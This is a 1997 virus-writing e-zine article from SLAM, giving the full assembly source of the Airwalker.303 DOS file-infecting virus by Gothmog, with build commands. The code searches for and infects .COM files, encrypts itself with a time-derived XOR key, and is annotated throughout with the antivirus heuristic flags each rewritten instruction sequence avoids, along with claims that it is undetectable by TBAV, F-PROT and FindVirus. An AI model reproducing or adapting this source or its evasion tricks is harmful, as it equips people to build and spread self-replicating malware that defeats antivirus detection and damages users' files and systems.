Copy Link
Add to Bookmark
Report
SLAM2.022: Advanced Heuristic Techniques - The Airwalker.303 Virus
; The Airwalker.303 Virus Written by Gothmog/[DHA97]
;
; z$$$$$No.
; @$$**""$$$$$N.
; ' $$P""$$$ ..
; =========== 4$$F 3$$$ ======== 4$F =======================================
; @$$F J$$F $P z o$$$r
; $$$ $$$ @$ u$$$ d$$$$$
; <$$$ $$$ 4$$ u$$$$$F :$$$$$$L
; @$$" $$$" $$$ .*""""$$$ $$$$^$$$
; $$$ $$$ d$$$Nf $$$ $$$$$$$$$r
; 4$$N$$" :$$$F 9$$ @$$$$*"$$$$
; d$$$$ *$$" 9$$F :$$$" $$$
; $$$" $$ 4$$$ 4$$ '$$r
; ========= $F =============== 9$ ========== *$$$ ==== '$" ===== "$L ========
;
; Assumes TASM v4.00 or v5.00 or A86 Macro Assembler v4.02; other assemblers
; may work, but are not personally tested or quality assured.
;
; Assemble with: tasm /m1 airw-303.asm (one pass should be sufficient)
; tlink /t airw-303.obj
;
; Alternately: a86 airw-303.asm airw-303.com (creates a 300 byte variant)
;
; As of right now, the Airwalker.303 virus is 100% unscannable with:
;
; ˛ TBAV v7.07 w/ high heuristic sensitivity enabled
; ˛ F-PROT v2.26 w/ switches /ANALYSE /GURU /PARANOID enabled
; ˛ Dr. Solomon's FindVirus v7.69 w/ the following command-line switches
; enabled: /!GURU /SECURE /VID /!IVN /!DOBOOTS /PACK /ANALYSE
; ˛ Microsoft Anti-Virus (big surprise... no great accomplishment here)
;
; ˛ More to come... AVPLite v3.0 build 107 updated 03/22/97 coming next...
.model tiny
.286
.code
org 0100h
start:
db 0E9h
dw offset virus_start - offset dummy_host
dummy_host:
mov ah, 09h
int 21h
int 20h
message db 'WARNING: You have just released the Airwalker.303 virus!', 0Dh, 0Ah, '$'
virus_start:
db 0BDh
delta_offset:
dw offset virus_start
; ===========================================================================
; F-Protect will flag this virus if the following code is included, but stops
; tracing immediately if a register is called, even if the /analyse /paranoid
; and /guru command-line switches are used.
;
; call decrypt
; ===========================================================================
lea ax, [bp + decrypt - virus_start]
call ax
start_encrypt:
; ===========================================================================
; O Found code that can be used to overwrite/move a program in memory.
;
; mov di, 0100h
; lea si, [bp + original - virus_start]
; ===========================================================================
mov si, 0100h
lea di, [bp + original - virus_start]
xchg si, di
movsw
movsb
mov ah, 1Ah
lea dx, [bp + virus_dta - virus_start]
int 21h
; ===========================================================================
; F Suspicious file access. Might be able to infect a file.
;
; mov ah, 4Eh
; lea dx, [bp + file_mask - virus_start]
; mov cx, 32
; int 21h
; ===========================================================================
mov bh, 4Eh
xchg ax, bx
lea dx, [bp + file_mask - virus_start]
mov cx, 32
int 21h
jnc open_again
return_to_host:
; ===========================================================================
; B Back to entry point. Contains code to re-start the program after
; modifications at the entry-point are made. Very usual for viruses.
;
; mov si, 0100h
; push si
; ret
; ===========================================================================
dec sp
mov si, sp
mov word ptr [si], 0100h
ret
open_again:
mov ax, 3D02h
lea dx, [bp + name_buffer - virus_start]
int 21h
jc return_to_host
xchg bx, ax
mov ah, 3Fh
lea dx, [bp + original - virus_start]
mov cx, 03h
int 21h
jc return_to_host
push bx
mov bx, dx
cmp byte ptr [bx], 0E9h
pop bx
je find_next_file
mov ax, 4202h
xor cx, cx
cwd
int 21h
jc return_to_host
push ax
add ax, offset start
mov word ptr [bp + delta_offset - virus_start], ax
mov ah, 2Ch
int 21h
xchg ch, cl
add dx, cx
mov word ptr[bp + encrypt_key - virus_start], dx
mov ah, 40h
mov cx, virus_end - virus_start
lea dx, [bp + virus_start - virus_start]
pusha
jmp write_virus
out_write_virus:
pop ax
jc return_to_host
sub ax, 03h
push bx
mov bx, bp
mov word ptr cs:[bx + 1], ax
mov byte ptr [bx], 0E9h
pop bx
mov ax, 4200h
xor cx, cx
cwd
int 21h
jc return_to_host
; ===========================================================================
; F Suspicious file access. Might be able to infect a file.
;
; mov ah, 40h
; lea dx, [bp + virus_start - virus_start]
; mov cx, 03h
; int 21h
; jc return_to_host
; ===========================================================================
mov ax, 03h
mov ch, 40h
lea dx, [bp + virus_start - virus_start]
xchg ax, cx
int 21h
jc return_to_host
mov ah, 3Eh
int 21h
jump_up:
jmp return_to_host
find_next_file:
mov ah, 3Eh
int 21h
lea dx, [bp + file_mask - virus_start]
mov ah, 4Fh
int 21h
jc jump_up
jmp open_again
original:
mov dx, offset message
virus_name db '[airwalker]', 00h
virus_author db '(c) 1997 gothmog', 00h
; S Contains a routine to search for executable (.COM or .EXE) files.
file_mask db '*.com', 00h ; *** S flag
virus_dta db 30 dup (0)
name_buffer db 13 dup (0)
end_encrypt equ $ - 0001h
encrypt:
decrypt:
lea si, [bp + start_encrypt - virus_start]
mov di, si
mov cx, (end_encrypt - start_encrypt + 1) / 2
xor_loop:
lodsw
int 03h
jnc false_jump
false_jump_2:
stosw
loop xor_loop
ret
false_jump:
db 35h
encrypt_key dw 0000
jnc false_jump_2
write_virus:
call encrypt
popa
int 21h
call decrypt
jmp out_write_virus
virus_end:
end start
; ============================================================[ code ends ]==
